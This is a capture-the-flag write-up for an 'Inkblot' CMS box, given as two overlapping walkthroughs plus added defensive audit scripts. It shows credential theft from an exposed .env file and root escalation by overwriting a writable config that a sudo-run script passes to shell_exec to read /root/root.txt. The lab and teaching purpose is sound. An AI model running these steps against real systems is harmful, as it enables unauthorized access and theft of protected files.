Inkblot
Inkblot runs an internal CMS built by someone who trusted their logs a little too much. The file inclusion is right there. What you put in the request is what ends up in the log. What ends up in the log ends up on the page.
RatCTF
Community
The initial step was service enumeration to identify exposed services on the target.
```bash
nmap -sV -p 30591,30592 45.79.202.95
```
Based on the challenge description mentioning an internal CMS, the web application became the primary attack surface.
After accessing the web application, content discovery was performed to identify hidden files and directories.
```bash
ffuf -u http://45.79.202.95:30592/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
```
The scan revealed an exposed .env file.
To verify its contents:
```bash
curl http://45.79.202.95:30592/.env
```
```text
SSH_USER=webdev
SSH_PASS=<redacted>
```
Sensitive credentials were stored inside a publicly accessible environment file, resulting in credential disclosure and providing a direct path to initial access.
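As an added example (not part of this write-up or of the Inkblot CMS), the following is a pre-deployment check that catches the class of exposure found above. It walks a document root, reports dotfiles and leftover dumps, backups and swap files that are world-readable and therefore servable, and names the credential-looking variables inside them without printing their values. The file-name patterns and the assumption that anything world-readable under the docroot is served are mine; the sample docroot used in the usage line is constructed.

```shell
#!/bin/sh
# Added example, not part of the original write-up or of the Inkblot CMS.
# Pre-deployment check: list files under a web document root that a default
# web server configuration would serve but that should never be reachable
# (.env files, .git contents, editor swap files, backups, SQL dumps), and name
# the credential-looking variables they contain. Assumption: anything under
# the docroot that is world-readable is servable, which was the case here.

# scan_docroot DOCROOT
# Prints one line per finding: "<relative path> <KEY names or a note>".
# Variable names are reported, never their values, so the report itself
# cannot leak the secret it found.
scan_docroot() {
    docroot="$1"
    find "$docroot" -type f \
        \( -name '.env' -o -name '.env.*' -o -path '*/.git/*' \
           -o -name '*.bak' -o -name '*.sql' -o -name '*.swp' -o -name '*~' \) \
        -perm -004 2>/dev/null | sort | while read -r f; do
        rel="${f#"$docroot"/}"
        # KEY= names only (PASS, SECRET, TOKEN, KEY), joined on one line.
        keys=$(grep -Eio '^[A-Z0-9_]*(PASS|PASSWORD|SECRET|TOKEN|KEY)[A-Z0-9_]*=' "$f" 2>/dev/null \
               | sed 's/=$//' | tr '\n' ' ')
        printf '%s %s\n' "$rel" "${keys:-(no obvious credentials)}"
    done
}

# Usage against a real docroot, e.g. before publishing the site:
#   scan_docroot /var/www/html
```

Run it against the docroot before the site goes live (or against a checkout of the repository that is deployed to it). A non-empty report is a finding regardless of what the web server's dotfile rules are: the right fix is to keep such files out of the docroot entirely, not to rely on a deny rule.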
Using the leaked credentials, SSH access was obtained.
```bash
ssh webdev@45.79.202.95 -p 30591
```
Authentication was successful and a shell was obtained as the webdev user.
After obtaining access, the user flag was retrieved.
```bash
cat user.txt
```
Output:
```text
flag{REDACTED}
```
The next step was to identify available sudo privileges.
```bash
sudo -l
```
```text
(root) NOPASSWD: /usr/bin/php /opt/webdev/report.php
```
This indicated that the current user could execute the PHP reporting script as root without supplying a password.
---
## 6. Source Code Analysis
The privileged script was reviewed to understand its behavior.
```bash
cat /opt/webdev/report.php
```
Relevant code:
```php
require_once '/opt/webdev/config.php';
$output = shell_exec($REPORT_CMD);
```
### Observation
The script executes the contents of `$REPORT_CMD` using `shell_exec()`. Since the value is imported from an external configuration file, the next step was to investigate whether that file could be modified.
---
## 7. Writable Configuration File
Writable files within the application directory were identified.
```bash
find /opt/webdev -type f -writable 2>/dev/null
```
Result:
```text
/opt/webdev/config.php
```
File permissions:
```bash
ls -l /opt/webdev/config.php
```
```text
-rw-rw-r-- 1 webdev webdev config.php
```
### Security Issue
The configuration file controlling the command executed by the root-owned script was writable by the low-privileged user. This created a privilege escalation path because arbitrary commands could be injected and later executed as root.
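As an added example (not from the write-up), here is a small audit that generalises the `find -writable` step above: it pulls the script paths out of `sudo -l` output, then lists every literal `require`/`include` target of each script and marks the ones the invoking user can replace. A target counts as replaceable when the file itself is writable, or when the nearest existing directory above it is writable (the file can be deleted and recreated, or created if the include is missing). The function names, the assumption that include paths are string literals resolved against the script's directory, and the sample files in the test are mine.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a PHP script that a
# sudo rule runs as root for includes the invoking user can tamper with.
# Assumptions: include targets are string literals; relative paths are
# resolved against the script's own directory; sticky-bit directories are not
# special-cased.

# Extract the script argument from `sudo -l` lines such as
#   (root) NOPASSWD: /usr/bin/php /opt/webdev/report.php
# Reads `sudo -l` output on stdin and prints one script path per line.
sudo_php_targets() {
    sed -nE 's#^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?/usr/bin/php[0-9.]*[[:space:]]+(/[^[:space:]]+).*#\2#p'
}

# Walk up from $1 until something that exists is found.
nearest_existing() {
    p="$1"
    while [ ! -e "$p" ] && [ "$p" != "/" ]; do
        p=$(dirname "$p")
    done
    printf '%s\n' "$p"
}

# audit_includes SCRIPT
# Prints "<path> writable-file", "<path> writable-dir" or "<path> ok" for the
# script itself and for each literal include/require target inside it. The
# script is checked too: a writable script is the same bug one level up.
audit_includes() {
    script="$1"
    {
        printf '%s\n' "$script"
        # Pull the quoted string out of include/require(_once) statements.
        grep -Eo "(require|include)(_once)?[[:space:]]*\(?[[:space:]]*['\"][^'\"]+['\"]" "$script" \
            | sed -E "s/.*['\"]([^'\"]+)['\"]/\1/"
    } | while read -r target; do
        case "$target" in
            /*) ;;                                         # absolute: use as-is
            *)  target="$(dirname "$script")/$target" ;;   # relative: resolve against the script (assumption)
        esac
        if [ -w "$target" ]; then
            printf '%s writable-file\n' "$target"
        elif [ -w "$(nearest_existing "$(dirname "$target")")" ]; then
            printf '%s writable-dir\n' "$target"
        else
            printf '%s ok\n' "$target"
        fi
    done
}

# Usage on a live host, as webdev could have done on Inkblot:
#   sudo -l | sudo_php_targets | while read -r s; do audit_includes "$s"; done
```

Anything other than `ok` in the output means the sudo rule is effectively `NOPASSWD: ALL`: whatever the script does with the included file's contents, the user can make it do something else. The `writable-dir` case is the one `find -writable` misses, since the file's own mode can be `644 root:root` and still be replaceable when its parent directory belongs to the user.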
---
## 8. Exploitation
The configuration file was modified to replace the existing command. The heredoc delimiter is quoted so that the shell does not expand `$REPORT_CMD` before it reaches the file.
```bash
cat > /opt/webdev/config.php << 'EOF'
<?php
$REPORT_CMD = "id";
EOF
```
The privileged script was then executed.
```bash
sudo /usr/bin/php /opt/webdev/report.php
```
Output:
```text
uid=0(root) gid=0(root) groups=0(root)
```
This confirmed that commands supplied through the configuration file were executed with root privileges.
To demonstrate full system compromise, the command was updated to read the root flag.
```bash
cat > /opt/webdev/config.php << 'EOF'
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
```
Executing the script again:
```bash
sudo /usr/bin/php /opt/webdev/report.php
```
Output:
```text
flag{REDACTED}
```
Root access was successfully achieved.
The attack chain rests on two independent security weaknesses:
- Credential leakage via an exposed .env file (login successful using the leaked credentials)
- A root-executed command that the attacker can modify (the configuration file loaded by the sudo-runnable script is writable by webdev)
The combination of these issues allowed arbitrary command execution as root, resulting in complete system compromise.
In short:
Step 1: Overwrite config
```bash
cat > /opt/webdev/config.php << 'EOF'
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
```
Step 2: Trigger sudo script
```bash
sudo /usr/bin/php /opt/webdev/report.php
```
## 9. Root Flag Retrieval
Output:
```text
[report] Running: cat /root/root.txt
flag{.........}
```
Challenge Description: A forgotten internal CMS exposes sensitive configuration data. Enumerate the application, obtain initial access, and abuse a privileged reporting tool to gain root access.
Service Enumeration:
```bash
nmap -sV -p 30591,30592 45.79.209.127
```
Results:
- 30591: OpenSSH 9.2p1
- 30592: Apache httpd 2.4.67
The scan reveals two open ports: 30592 (HTTP) and 30591 (SSH). Since the challenge description references a forgotten internal CMS, the web application becomes the primary target.
Web Fingerprinting:
```bash
whatweb http://45.79.209.127:30592
```
Result:
```text
Inkblot CMS
```
Directory Enumeration:
```bash
gobuster dir -u http://45.79.209.127:30592 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,txt,html,json
```
Analyzing the Output:
Gobuster reveals an exposed .env file:
```text
/.env (Status: 200)
```
Retrieving Sensitive Configuration Data:
```bash
curl http://45.79.209.127:30592/.env
```
Result:
```text
SSH_USER=w...v
SSH_PASS=I....!
```
Initial Access:
Use the exposed credentials to authenticate via SSH.
```bash
ssh -p 30591 webdev@45.79.209.127
```
Claiming the User Flag:
```bash
cat ~/user.txt
```
User Flag:
```text
flag{...._...._...}
```
After obtaining a shell as webdev, enumerate sudo permissions.
Checking Sudo Permissions:
```bash
sudo -l
```
Result:
```text
(root) NOPASSWD: /usr/bin/php /opt/webdev/report.php
```
Inspecting the Privileged Script:
```bash
cat /opt/webdev/report.php
```
```php
<?php
require_once '/opt/webdev/config.php';
echo "[report] Running: {$REPORT_CMD}\n";
$output = shell_exec($REPORT_CMD);
echo $output;
```
Checking File Permissions:
```bash
ls -l /opt/webdev/
```
Result:
```text
-rw-rw-r-- 1 webdev webdev config.php
-rwxr-xr-x 1 root   root   report.php
```
The script is executed as root through sudo, but it loads a configuration file that is writable by the unprivileged user.
Inspecting the Configuration File:
```bash
cat /opt/webdev/config.php
```
```php
<?php
$REPORT_CMD = "df -h";
```
Exploitation:
Replace the command executed by the report generator.
```bash
cat > /opt/webdev/config.php << 'EOF'
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
```
Execute the Report as Root:
```bash
sudo /usr/bin/php /opt/webdev/report.php
```
Output:
```text
flag{...._...._...}
```
Root Flag:
```text
flag{...._...._...}
```
Two takeaways: .env files should never be publicly accessible through the web server, and shell_exec() should never execute user-controlled or user-modifiable input. For a script that runs under sudo, that means the configuration it loads must be owned by root and not writable by the invoking user, otherwise the sudo rule is equivalent to granting that user an unrestricted root shell.